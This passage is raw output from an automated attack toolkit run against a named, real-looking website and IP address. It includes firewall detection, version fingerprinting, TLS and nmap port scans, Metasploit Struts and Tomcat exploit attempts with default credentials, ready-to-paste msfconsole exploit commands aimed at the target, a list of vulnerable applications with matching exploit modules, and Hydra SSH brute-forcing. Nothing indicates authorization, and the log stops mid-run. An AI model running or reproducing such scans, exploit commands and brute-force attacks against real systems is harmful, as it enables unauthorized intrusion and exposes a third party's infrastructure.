1300. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1301. | V V // o // _/ | V V // 0 // 0 // _/
1302. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1303. <
1304. ...'
1305.  
1306. WAFW00F - Web Application Firewall Detection Tool
1307.  
1308. By Sandro Gauci && Wendel G. Henrique
1309.  
1310. Checking https://falange-autentica.es
1311. The site https://falange-autentica.es is behind a ModSecurity (OWASP CRS)
1312. Number of requests: 11
1313. #######################################################################################################################################
1314. https://falange-autentica.es [200 OK] Apache, Cookies[2b5581ae182de78f0daf6795785a3ed8], Country[FRANCE][FR], Email[contactar@falange-autentica.es], Frame, HTML5, HTTPServer[Apache], HttpOnly[2b5581ae182de78f0daf6795785a3ed8], IP[91.121.2.184], MetaGenerator[Joomla! - Open Source Content Management], OpenSearch[https://falange-autentica.es/component/search/?Itemid=101&amp;format=opensearch], PHP[5.6.14], Script[application/json,text/javascript], Title[Falange Auténtica], X-Powered-By[PHP/5.6.14], YouTube
1315. #######################################################################################################################################
1316.  
1317. wig - WebApp Information Gatherer
1318.  
1319.  
1320. Scanning https://falange-autentica.es...
1321. ___________________________________________ SITE INFO ___________________________________________
1322. IP Title
1323. 91.121.2.184 Falange Auténtica
1324.  
1325. ____________________________________________ VERSION ____________________________________________
1326. Name Versions Type
1327. Joomla! 3 | 3.3.1 | 3.3.1.rc | 3.3.2 | 3.3.2.rc | 3.3.3 | 3.3.4 CMS
1328. 3.3.5 | 3.3.6 | 3.4.0 | 3.4.0-alpha | 3.4.0-beta1
1329. 3.4.0-beta2 | 3.4.0-beta3 | 3.4.0-rc | 3.4.1 | 3.4.1-rc
1330. 3.4.1-rc2 | 3.4.2 | 3.4.2-rc | 3.4.3 | 3.4.4 | 3.4.4-rc
1331. 3.4.4-rc2 | 3.4.5 | 3.4.6 | 3.4.7 | 3.4.8 | 3.4.8-rc | 3.5.0
1332. 3.5.0-beta | 3.5.0-beta2 | 3.5.0-beta3 | 3.5.0-beta4
1333. 3.5.0-beta5 | 3.5.0-rc | 3.5.0-rc2 | 3.5.0-rc3 | 3.5.0-rc4
1334. 3.5.1 | 3.5.1-rc | 3.5.1-rc2 | 3.6.0 | 3.6.0-alpha
1335. 3.6.0-beta1 | 3.6.0-beta2 | 3.6.0-rc | 3.6.0-rc2 | 3.6.1
1336. 3.6.1-rc1 | 3.6.1-rc2 | 3.6.2 | 3.6.3-rc1
1337. Apache Platform
1338. PHP 5.6.14 Platform
1339. openSUSE tumbleweed OS
1340.  
1341. __________________________________________ INTERESTING __________________________________________
1342. URL Note Type
1343. /robots.txt robots.txt index Interesting
1344.  
1345. _____________________________________________ TOOLS _____________________________________________
1346. Name Link Software
1347. CMSmap https://github.com/Dionach/CMSmap Joomla!
1348. joomscan http://sourceforge.net/projects/joomscan/ Joomla!
1349.  
1350. _________________________________________________________________________________________________
1351. Time: 75.5 sec Urls: 431 Fingerprints: 40401
1352. #######################################################################################################################################
1353. HTTP/1.1 200 OK
1354. Date: Wed, 07 Nov 2018 22:37:24 GMT
1355. Server: Apache
1356. X-Powered-By: PHP/5.6.14
1357. Set-Cookie: 2b5581ae182de78f0daf6795785a3ed8=3qo5damo2no5e2i033rrjhmpq7; path=/; HttpOnly
1358. Expires: Wed, 17 Aug 2005 00:00:00 GMT
1359. Last-Modified: Wed, 07 Nov 2018 22:37:25 GMT
1360. Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
1361. Pragma: no-cache
1362. Vary: Accept-Encoding
1363. Content-Type: text/html; charset=utf-8
1364. #######################################################################################################################################
1365.  
1366.  
1367. AVAILABLE PLUGINS
1368. -----------------
1369.  
1370. PluginHeartbleed
1371. PluginHSTS
1372. PluginCompression
1373. PluginSessionRenegotiation
1374. PluginChromeSha1Deprecation
1375. PluginOpenSSLCipherSuites
1376. PluginSessionResumption
1377. PluginCertInfo
1378.  
1379.  
1380.  
1381. CHECKING HOST(S) AVAILABILITY
1382. -----------------------------
1383.  
1384. falange-autentica.es:443 => 91.121.2.184:443
1385.  
1386.  
1387.  
1388. SCAN RESULTS FOR FALANGE-AUTENTICA.ES:443 - 91.121.2.184:443
1389. ------------------------------------------------------------
1390.  
1391. * Deflate Compression:
1392. OK - Compression disabled
1393.  
1394. * Session Renegotiation:
1395. Client-initiated Renegotiations: OK - Rejected
1396. Secure Renegotiation: OK - Supported
1397.  
1398. * Certificate - Content:
1399. SHA1 Fingerprint: 4b82cef8595e0e573a3568c86ce18df4a0cfb877
1400. Common Name: falange-autentica.es
1401. Issuer: Let's Encrypt Authority X3
1402. Serial Number: 03B467C49D12782AA2B693ECFF0B1C9EC555
1403. Not Before: Oct 2 06:11:20 2018 GMT
1404. Not After: Dec 31 06:11:20 2018 GMT
1405. Signature Algorithm: sha256WithRSAEncryption
1406. Public Key Algorithm: rsaEncryption
1407. Key Size: 2048 bit
1408. Exponent: 65537 (0x10001)
1409. X509v3 Subject Alternative Name: {'DNS': ['falange-autentica.es']}
1410.  
1411. * Certificate - Trust:
1412. Hostname Validation: OK - Subject Alternative Name matches
1413. Google CA Store (09/2015): FAILED - Certificate is NOT Trusted: unable to get local issuer certificate
1414. Java 6 CA Store (Update 65): OK - Certificate is trusted
1415. Microsoft CA Store (09/2015): OK - Certificate is trusted
1416. Mozilla NSS CA Store (09/2015): OK - Certificate is trusted
1417. Apple CA Store (OS X 10.10.5): OK - Certificate is trusted
1418. Certificate Chain Received: ['falange-autentica.es', 'falange-autentica.es', "Let's Encrypt Authority X3"]
1419.  
1420. * Certificate - OCSP Stapling:
1421. NOT SUPPORTED - Server did not send back an OCSP response.
1422.  
1423. * Session Resumption:
1424. With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
1425. With TLS Session Tickets: OK - Supported
1426.  
1427. * SSLV2 Cipher Suites:
1428. Server rejected all cipher suites.
1429.  
1430. * SSLV3 Cipher Suites:
1431. Server rejected all cipher suites.
1432.  
1433.  
1434.  
1435. SCAN COMPLETED IN 2.41 S
1436. ------------------------
1437. Version: 1.11.12-static
1438. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1439.  
1440. Connected to 91.121.2.184
1441.  
1442. Testing SSL server falange-autentica.es on port 443 using SNI name falange-autentica.es
1443.  
1444. TLS Fallback SCSV:
1445. Server supports TLS Fallback SCSV
1446.  
1447. TLS renegotiation:
1448. Secure session renegotiation supported
1449.  
1450. TLS Compression:
1451. Compression disabled
1452.  
1453. Heartbleed:
1454. TLS 1.2 not vulnerable to heartbleed
1455. TLS 1.1 not vulnerable to heartbleed
1456. TLS 1.0 not vulnerable to heartbleed
1457.  
1458. Supported Server Cipher(s):
1459. Preferred TLSv1.2 256 bits ECDHE-RSA-AES256-GCM-SHA384 Curve P-256 DHE 256
1460. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-GCM-SHA256 Curve P-256 DHE 256
1461. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA384 Curve P-256 DHE 256
1462. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA256 Curve P-256 DHE 256
1463. Accepted TLSv1.2 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
1464. Accepted TLSv1.2 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1465. Accepted TLSv1.2 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1466. Accepted TLSv1.2 256 bits DHE-RSA-AES256-GCM-SHA384 DHE 1024 bits
1467. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA256 DHE 1024 bits
1468. Accepted TLSv1.2 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
1469. Accepted TLSv1.2 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
1470. Accepted TLSv1.2 128 bits DHE-RSA-AES128-GCM-SHA256 DHE 1024 bits
1471. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA256 DHE 1024 bits
1472. Accepted TLSv1.2 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
1473. Accepted TLSv1.2 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
1474. Accepted TLSv1.2 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
1475. Accepted TLSv1.2 128 bits RC4-SHA
1476. Preferred TLSv1.1 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
1477. Accepted TLSv1.1 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1478. Accepted TLSv1.1 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1479. Accepted TLSv1.1 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
1480. Accepted TLSv1.1 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
1481. Accepted TLSv1.1 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
1482. Accepted TLSv1.1 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
1483. Accepted TLSv1.1 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
1484. Accepted TLSv1.1 128 bits RC4-SHA
1485. Preferred TLSv1.0 128 bits ECDHE-RSA-RC4-SHA Curve P-256 DHE 256
1486. Accepted TLSv1.0 256 bits ECDHE-RSA-AES256-SHA Curve P-256 DHE 256
1487. Accepted TLSv1.0 128 bits ECDHE-RSA-AES128-SHA Curve P-256 DHE 256
1488. Accepted TLSv1.0 256 bits DHE-RSA-AES256-SHA DHE 1024 bits
1489. Accepted TLSv1.0 256 bits DHE-RSA-CAMELLIA256-SHA DHE 1024 bits
1490. Accepted TLSv1.0 128 bits DHE-RSA-AES128-SHA DHE 1024 bits
1491. Accepted TLSv1.0 128 bits DHE-RSA-SEED-SHA DHE 1024 bits
1492. Accepted TLSv1.0 128 bits DHE-RSA-CAMELLIA128-SHA DHE 1024 bits
1493. Accepted TLSv1.0 128 bits RC4-SHA
1494.  
1495. SSL Certificate:
1496. Signature Algorithm: sha256WithRSAEncryption
1497. RSA Key Strength: 2048
1498.  
1499. Subject: falange-autentica.es
1500. Altnames: DNS:falange-autentica.es
1501. Issuer: Let's Encrypt Authority X3
1502.  
1503. Not valid before: Oct 2 06:11:20 2018 GMT
1504. Not valid after: Dec 31 06:11:20 2018 GMT
1505. #######################################################################################################################################
1506.  
1507. ^ ^
1508. _ __ _ ____ _ __ _ _ ____
1509. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
1510. | V V // o // _/ | V V // 0 // 0 // _/
1511. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
1512. <
1513. ...'
1514.  
1515. WAFW00F - Web Application Firewall Detection Tool
1516.  
1517. By Sandro Gauci && Wendel G. Henrique
1518.  
1519. Checking http://falange-autentica.es:8080
1520.  
1521. http://falange-autentica.es:8080 [ Unassigned]
1522.  
1523. Version: 1.11.12-static
1524. OpenSSL 1.0.2-chacha (1.0.2g-dev)
1525.  
1526. Connected to 91.121.2.184
1527.  
1528. Testing SSL server falange-autentica.es on port 8080 using SNI name falange-autentica.es
1529.  
1530. TLS Fallback SCSV:
1531. Server does not support TLS Fallback SCSV
1532.  
1533. TLS renegotiation:
1534. Session renegotiation not supported
1535.  
1536. TLS Compression:
1537. Compression disabled
1538.  
1539. Heartbleed:
1540. TLS 1.2 not vulnerable to heartbleed
1541. TLS 1.1 not vulnerable to heartbleed
1542. TLS 1.0 not vulnerable to heartbleed
1543.  
1544. Supported Server Cipher(s):
1545. ====================================================================================
1546. RUNNING APACHE STRUTS CVE-2017-5638 VULN SCAN
1547. ====================================================================================
1548. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:38 EST
1549. ====================================================================================
1550. RUNNING APACHE STRUTS 2 REST PLUGIN XSTREAM RCE VULN CHECK
1551. ====================================================================================
1552. [*] If you see a 200 response code below, try running 'msfconsole -q -x "multi/http/struts2_rest_xstream; set RHOST "falange-autentica.es"; exploit -j; exit;
1553. RUNNING APACHE STRUTS JAKARTA RCE VULN CHECK
1554. ====================================================================================
1555. [*] If you see a 200 response code below, try running 'msfconsole -q -x "multi/http/struts2_content_type_ognl; set RHOST "falange-autentica.es"; exploit -j; exit;
1556. ====================================================================================
1557. RUNNING APACHE TOMCAT EXPLOITS
1558. ====================================================================================
1559. RHOSTS => falange-autentica.es
1560. RHOST => falange-autentica.es
1561. [-] WAR file not found
1562. [*] Auxiliary module execution completed
1563. [*] Scanned 1 of 1 hosts (100% complete)
1564. [*] Auxiliary module execution completed
1565. RPORT => 8080
1566. [*] Scanned 1 of 1 hosts (100% complete)
1567. [*] Auxiliary module execution completed
1568. [*] Attempting to connect to 91.121.2.184:8080
1569. [*] Scanned 1 of 1 hosts (100% complete)
1570. [*] Auxiliary module execution completed
1571. [*] http://91.121.2.184:8080/admin/j_security_check - Checking j_security_check...
1572. [*] Scanned 1 of 1 hosts (100% complete)
1573. [*] Auxiliary module execution completed
1574. [*] Scanned 1 of 1 hosts (100% complete)
1575. [*] Auxiliary module execution completed
1576. [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
1577. [*] Exploit completed, but no session was created.
1578. USERNAME => tomcat
1579. PASSWORD => tomcat
1580. [-] Exploit aborted due to failure: unreachable: The target server did not respond to fingerprinting, use 'set FingerprintCheck false' to disable this check.
1581. [*] Exploit completed, but no session was created.
1582. #######################################################################################################################################
1583.  
1584.  
1585.  
1586. * --- JexBoss: Jboss verify and EXploitation Tool --- *
1587. | * And others Java Deserialization Vulnerabilities * |
1588. | |
1589. | @author: João Filho Matos Figueiredo |
1590. | @contact: joaomatosf@gmail.com |
1591. | |
1592. | @update: https://github.com/joaomatosf/jexboss |
1593. #______________________________________________________#
1594.  
1595. @version: 1.2.4
1596.  
1597. * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
1598.  
1599.  
1600. ** Checking Host: http://falange-autentica.es:8080 **
1601.  
1602. [*] Checking admin-console:
1603. * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: /admin-console//github.com/joaomatosf/jexboss (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
1604.  
1605. [*] Checking Struts2:
1606. * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
1607.  
1608. [*] Checking Servlet Deserialization:
1609. * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
1610.  
1611. [*] Checking Application Deserialization:
1612. * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
1613.  
1614. [*] Checking Jenkins:
1615. * An error occurred while connecting to the host http://falange-autentica.es:8080 (HTTPConnectionPool(host='falange-autentica.es', port=8080): Max retries exceeded with url: / (Caused by ProtocolError("Connection broken: error(104, 'Connection reset by peer')", error(104, 'Connection reset by peer'))))
1616.  
1617. [*] Checking web-console: [ ERROR ]
1618. * The server http://falange-autentica.es:8080 is not an HTTP server.
1619.  
1620.  
1621.  
1622. * Results:
1623. The server is not vulnerable to bugs tested ... :D
1624.  
1625. * Info: review, suggestions, updates, etc:
1626. https://github.com/joaomatosf/jexboss
1627.  
1628. * DONATE: Please consider making a donation to help improve this tool,
1629. * Bitcoin Address: 14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C
1630.  
1631. #######################################################################################################################################
1632.  
1633. I, [2018-11-07T17:38:52.807771 #18562] INFO -- : Initiating port scan
1634. I, [2018-11-07T17:39:41.499183 #18562] INFO -- : Using nmap scan output file logs/nmap_output_2018-11-07_17-38-52.xml
1635. I, [2018-11-07T17:39:41.500279 #18562] INFO -- : Discovered open port: 91.121.2.184:80
1636. I, [2018-11-07T17:39:42.184442 #18562] INFO -- : Discovered open port: 91.121.2.184:443
1637. I, [2018-11-07T17:39:43.563216 #18562] INFO -- : Discovered open port: 91.121.2.184:465
1638. I, [2018-11-07T17:39:50.498987 #18562] INFO -- : Discovered open port: 91.121.2.184:993
1639. I, [2018-11-07T17:39:50.969259 #18562] INFO -- : Discovered open port: 91.121.2.184:60443
1640. I, [2018-11-07T17:39:52.467275 #18562] INFO -- : <<<Enumerating vulnerable applications>>>
1641.  
1642.  
1643. --------------------------------------------------------
1644. <<<Yasuo discovered following vulnerable applications>>>
1645. --------------------------------------------------------
1646. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
1647. | App Name | URL to Application | Potential Exploit | Username | Password |
1648. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
1649. | Plixer Scrutinizer NetFlow | http://91.121.2.184:80/cgi-bin/admin.cgi | ./auxiliary/admin/http/scrutinizer_add_user.rb | | |
1650. +----------------------------+------------------------------------------+------------------------------------------------+----------+----------+
1651. #######################################################################################################################################
1652. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:42 EST
1653. NSE: Loaded 148 scripts for scanning.
1654. NSE: Script Pre-scanning.
1655. Initiating NSE at 17:42
1656. Completed NSE at 17:42, 0.00s elapsed
1657. Initiating NSE at 17:42
1658. Completed NSE at 17:42, 0.00s elapsed
1659. Initiating Parallel DNS resolution of 1 host. at 17:42
1660. Completed Parallel DNS resolution of 1 host. at 17:43, 16.50s elapsed
1661. Initiating SYN Stealth Scan at 17:43
1662. Scanning falange-autentica.es (91.121.2.184) [474 ports]
1663. Discovered open port 993/tcp on 91.121.2.184
1664. Discovered open port 80/tcp on 91.121.2.184
1665. Discovered open port 443/tcp on 91.121.2.184
1666. Discovered open port 22/tcp on 91.121.2.184
1667. Discovered open port 8080/tcp on 91.121.2.184
1668. Discovered open port 465/tcp on 91.121.2.184
1669. Discovered open port 389/tcp on 91.121.2.184
1670. Discovered open port 7071/tcp on 91.121.2.184
1671. Completed SYN Stealth Scan at 17:43, 4.79s elapsed (474 total ports)
1672. Initiating Service scan at 17:43
1673. Scanning 8 services on falange-autentica.es (91.121.2.184)
1674. Completed Service scan at 17:43, 21.27s elapsed (8 services on 1 host)
1675. Initiating OS detection (try #1) against falange-autentica.es (91.121.2.184)
1676. Retrying OS detection (try #2) against falange-autentica.es (91.121.2.184)
1677. Initiating Traceroute at 17:43
1678. Completed Traceroute at 17:43, 0.12s elapsed
1679. Initiating Parallel DNS resolution of 2 hosts. at 17:43
1680. Completed Parallel DNS resolution of 2 hosts. at 17:43, 16.50s elapsed
1681. NSE: Script scanning 91.121.2.184.
1682. Initiating NSE at 17:43
1683. Completed NSE at 17:46, 181.15s elapsed
1684. Initiating NSE at 17:46
1685. Completed NSE at 17:46, 1.13s elapsed
1686. Nmap scan report for falange-autentica.es (91.121.2.184)
1687. Host is up (0.11s latency).
1688. Not shown: 463 filtered ports
1689. PORT STATE SERVICE VERSION
1690. 22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
1691. | ssh-hostkey:
1692. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
1693. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
1694. 25/tcp closed smtp
1695. 80/tcp open http Apache httpd (PHP 5.6.14)
1696. |_http-favicon: Unknown favicon MD5: DCE399F4B8AE42FFF4346099CFD7C983
1697. |_http-generator: Joomla! - Open Source Content Management
1698. | http-methods:
1699. |_ Supported Methods: GET HEAD POST OPTIONS
1700. | http-robots.txt: 15 disallowed entries
1701. | /joomla/administrator/ /administrator/ /bin/ /cache/
1702. | /cli/ /components/ /includes/ /installation/ /language/
1703. |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
1704. |_http-server-header: Apache
1705. |_http-title: Falange Aut\xC3\xA9ntica
1706. 139/tcp closed netbios-ssn
1707. 389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
1708. | ssl-cert: Subject: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
1709. | Issuer: commonName=ks37079.kimsufi.com/organizationName=Zimbra Collaboration Server/stateOrProvinceName=N/A/countryName=US
1710. | Public Key type: rsa
1711. | Public Key bits: 1024
1712. | Signature Algorithm: sha1WithRSAEncryption
1713. | Not valid before: 2013-12-09T09:57:56
1714. | Not valid after: 2018-12-08T09:57:56
1715. | MD5: 922f 71f8 2bf1 f953 ff2f 28d6 903f a524
1716. |_SHA-1: 5aa2 2e6f 9c8b 2556 b75c 87e0 f34a c1ce 2ee3 85a1
1717. |_ssl-date: TLS randomness does not represent time
1718. 443/tcp open ssl/ssl Apache httpd (SSL-only mode)
1719. | http-methods:
1720. |_ Supported Methods: GET HEAD
1721. | http-robots.txt: 15 disallowed entries
1722. | /joomla/administrator/ /administrator/ /bin/ /cache/
1723. | /cli/ /components/ /includes/ /installation/ /language/
1724. |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
1725. |_http-server-header: Apache
1726. | ssl-cert: Subject: commonName=falange-autentica.es
1727. | Subject Alternative Name: DNS:falange-autentica.es
1728. | Issuer: commonName=Let's Encrypt Authority X3/organizationName=Let's Encrypt/countryName=US
1729. | Public Key type: rsa
1730. | Public Key bits: 2048
1731. | Signature Algorithm: sha256WithRSAEncryption
1732. | Not valid before: 2018-10-02T06:11:20
1733. | Not valid after: 2018-12-31T06:11:20
1734. | MD5: e93b 6570 be85 20b1 cccc 0345 2d30 5948
1735. |_SHA-1: 4b82 cef8 595e 0e57 3a35 68c8 6ce1 8df4 a0cf b877
1736. |_ssl-date: 2018-11-07T22:43:52+00:00; 0s from scanner time.
1737. 445/tcp closed microsoft-ds
1738. 465/tcp open ssl/smtps?
1739. |_smtp-commands: Couldn't establish connection on port 465
1740. |_ssl-date: TLS randomness does not represent time
1741. 993/tcp open ssl/imaps?
1742. |_ssl-date: TLS randomness does not represent time
1743. 7071/tcp open ssl/iwg1?
1744. |_ssl-date: 2018-11-07T22:43:48+00:00; 0s from scanner time.
1745. 8080/tcp open ssh OpenSSH 5.3 (protocol 2.0)
1746. | ssh-hostkey:
1747. | 1024 e4:7e:99:a4:23:fd:8c:a3:e7:a5:1f:21:8c:e8:68:0f (DSA)
1748. |_ 2048 cf:fd:6c:82:51:78:63:3c:c0:33:e0:ab:05:9e:af:07 (RSA)
1749. Device type: general purpose|storage-misc|router|media device|WAP|broadband router
1750. Running (JUST GUESSING): Linux 2.6.X|3.X (94%), HP embedded (91%), MikroTik RouterOS 6.X (90%), Infomir embedded (90%), Ubiquiti embedded (90%), Ubiquiti AirOS 5.X (90%)
1751. OS CPE: cpe:/o:linux:linux_kernel:2.6.32 cpe:/o:linux:linux_kernel:3 cpe:/h:hp:p2000_g3 cpe:/o:mikrotik:routeros:6.30 cpe:/o:linux:linux_kernel:2.6 cpe:/h:infomir:mag-250 cpe:/h:ubnt:airmax_nanostation cpe:/o:ubnt:airos:5.5.9
1752. Aggressive OS guesses: Linux 2.6.32 (94%), Linux 2.6.32 - 3.1 (94%), Linux 2.6.32 - 3.13 (94%), Linux 2.6.32 - 2.6.39 (92%), Linux 2.6.39 (92%), Linux 3.10 (92%), Linux 3.2 (92%), HP P2000 G3 NAS device (91%), Linux 3.5 (91%), Linux 3.8 (91%)
1753. No exact OS matches for host (test conditions non-ideal).
1754. Uptime guess: 21.266 days (since Wed Oct 17 12:24:18 2018)
1755. Network Distance: 2 hops
1756. TCP Sequence Prediction: Difficulty=257 (Good luck!)
1757. IP ID Sequence Generation: All zeros
1758.  
1759. TRACEROUTE (using port 445/tcp)
1760. HOP RTT ADDRESS
1761. 1 107.07 ms 10.251.200.1
1762. 2 106.90 ms 91.121.2.184
1763.  
1764. NSE: Script Post-scanning.
1765. Initiating NSE at 17:46
1766. Completed NSE at 17:46, 0.00s elapsed
1767. Initiating NSE at 17:46
1768. Completed NSE at 17:46, 0.00s elapsed
1769. Read data files from: /usr/bin/../share/nmap
1770. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1771. Nmap done: 1 IP address (1 host up) scanned in 247.58 seconds
1772. Raw packets sent: 1028 (49.416KB) | Rcvd: 3952 (2.351MB)
1773. #######################################################################################################################################
1774. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:46 EST
1775. NSE: Loaded 148 scripts for scanning.
1776. NSE: Script Pre-scanning.
1777. Initiating NSE at 17:46
1778. Completed NSE at 17:46, 0.00s elapsed
1779. Initiating NSE at 17:46
1780. Completed NSE at 17:46, 0.00s elapsed
1781. Initiating Parallel DNS resolution of 1 host. at 17:46
1782. Completed Parallel DNS resolution of 1 host. at 17:47, 16.50s elapsed
1783. Initiating UDP Scan at 17:47
1784. Scanning falange-autentica.es (91.121.2.184) [14 ports]
1785. Completed UDP Scan at 17:47, 2.83s elapsed (14 total ports)
1786. Initiating Service scan at 17:47
1787. Scanning 12 services on falange-autentica.es (91.121.2.184)
1788. Service scan Timing: About 8.33% done; ETC: 18:06 (0:17:58 remaining)
1789. Completed Service scan at 17:48, 102.58s elapsed (12 services on 1 host)
1790. Initiating OS detection (try #1) against falange-autentica.es (91.121.2.184)
1791. Retrying OS detection (try #2) against falange-autentica.es (91.121.2.184)
1792. Initiating Traceroute at 17:48
1793. Completed Traceroute at 17:49, 7.18s elapsed
1794. Initiating Parallel DNS resolution of 1 host. at 17:49
1795. Completed Parallel DNS resolution of 1 host. at 17:49, 16.50s elapsed
1796. NSE: Script scanning 91.121.2.184.
1797. Initiating NSE at 17:49
1798. Completed NSE at 17:49, 20.38s elapsed
1799. Initiating NSE at 17:49
1800. Completed NSE at 17:49, 1.03s elapsed
1801. Nmap scan report for falange-autentica.es (91.121.2.184)
1802. Host is up (0.11s latency).
1803.  
1804. PORT STATE SERVICE VERSION
1805. 53/udp open|filtered domain
1806. 67/udp open|filtered dhcps
1807. 68/udp open|filtered dhcpc
1808. 69/udp open|filtered tftp
1809. 88/udp open|filtered kerberos-sec
1810. 123/udp open|filtered ntp
1811. 137/udp filtered netbios-ns
1812. 138/udp filtered netbios-dgm
1813. 139/udp open|filtered netbios-ssn
1814. 161/udp open|filtered snmp
1815. 162/udp open|filtered snmptrap
1816. 389/udp open|filtered ldap
1817. 520/udp open|filtered route
1818. 2049/udp open|filtered nfs
1819. Too many fingerprints match this host to give specific OS details
1820.  
1821. TRACEROUTE (using port 137/udp)
1822. HOP RTT ADDRESS
1823. 1 107.78 ms 10.251.200.1
1824. 2 ... 3
1825. 4 105.57 ms 10.251.200.1
1826. 5 108.54 ms 10.251.200.1
1827. 6 108.53 ms 10.251.200.1
1828. 7 108.52 ms 10.251.200.1
1829. 8 108.51 ms 10.251.200.1
1830. 9 108.50 ms 10.251.200.1
1831. 10 108.50 ms 10.251.200.1
1832. 11 ... 18
1833. 19 105.15 ms 10.251.200.1
1834. 20 102.11 ms 10.251.200.1
1835. 21 ... 28
1836. 29 106.62 ms 10.251.200.1
1837. 30 106.29 ms 10.251.200.1
1838.  
1839. NSE: Script Post-scanning.
1840. Initiating NSE at 17:49
1841. Completed NSE at 17:49, 0.00s elapsed
1842. Initiating NSE at 17:49
1843. Completed NSE at 17:49, 0.00s elapsed
1844. Read data files from: /usr/bin/../share/nmap
1845. OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
1846. Nmap done: 1 IP address (1 host up) scanned in 171.03 seconds
1847. Raw packets sent: 135 (11.658KB) | Rcvd: 5025 (1.563MB)
1848. #######################################################################################################################################
1849. __________ __ ____ ___
1850. \______ \_______ __ ___/ |_ ____ \ \/ /
1851. | | _/\_ __ \ | \ __\/ __ \ \ /
1852. | | \ | | \/ | /| | \ ___/ / \
1853. |______ / |__| |____/ |__| \___ >___/\ \
1854. \/ \/ \_/
1855.  
1856. + -- --=[BruteX v1.7 by 1N3
1857. + -- --=[http://crowdshield.com
1858.  
1859.  
1860. ################################### Running Port Scan #################################################################################
1861. Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-07 17:49 EST
1862. Nmap scan report for falange-autentica.es (91.121.2.184)
1863. Host is up (0.11s latency).
1864. Not shown: 17 filtered ports, 3 closed ports
1865. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1866. PORT STATE SERVICE
1867. 22/tcp open ssh
1868. 80/tcp open http
1869. 389/tcp open ldap
1870. 443/tcp open https
1871. 993/tcp open imaps
1872. 8080/tcp open http-proxy
1873.  
1874. Nmap done: 1 IP address (1 host up) scanned in 18.33 seconds
1875.  
1876. ################################### Running Brute Force ###############################################################################
1877.  
1878. + -- --=[Port 21 closed... skipping.
1879. + -- --=[Port 22 opened... running tests...
1880. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1881.  
1882. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:00
1883. [DATA] max 1 task per 1 server, overall 1 task, 363 login tries, ~363 tries per task
1884. [DATA] attacking ssh://falange-autentica.es:22/
1885. Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
1886.  
1887. Hydra (http://www.thc.org/thc-hydra) starting at 2018-11-07 17:50:14
1888. [DATA] max 1 task per 1 server, overall 1 task, 1530 login tries (l:34/p:45), ~1530 tries per task
1889. [DATA] attacking ssh://falange-autentica.es:22/
1890. + -- --=[Port 23 closed... skipping.
1891. + -- --=[Port 25 closed... skipping.
1892. + -- --=[Port 80 opened... running tests...
